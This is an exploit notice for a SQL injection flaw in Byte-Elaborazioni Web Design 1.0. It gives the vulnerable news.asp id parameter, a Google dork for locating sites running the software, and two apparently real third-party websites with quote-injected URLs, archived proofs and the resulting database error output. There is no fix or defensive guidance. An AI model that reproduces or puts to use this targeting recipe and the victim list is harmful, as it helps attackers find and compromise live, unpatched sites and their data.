Byte-Elaborazioni Web Design version 1.0 suffers from a remote SQL injection vulnerability.
efb608dbf782836782c184c3cf72e5b4#####################################################
# Exploit Title : Byte-Elaborazioni Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : Byte-Elaborazioni.Com
# Tested On : Windows
# Category : WebApps
# Version Information : 1.0 - Microsoft ASP.NET - IIS 6.0
+ Windows Server Operating System
# Exploit Risk : Medium
# Google Dork : intext:''Credits BYTE elaborazioni''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
#####################################################
# Exploit : /news.asp?id=[SQL Injection]
#####################################################
# Example Site => agostinibruno.it/news.asp?id=55%27
=> [ Proof of Concept ] => archive.is/kR4VT
# Example Site => linea2vargenteria.it/eng/news.asp?id=1%27
=> [ Proof of Concept ] => archive.is/G4HeO
#####################################################
# SQL-DB Error =>
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Syntax error in string in query expression 'codice = 1''.
/eng/news.asp, line 42
#####################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#####################################################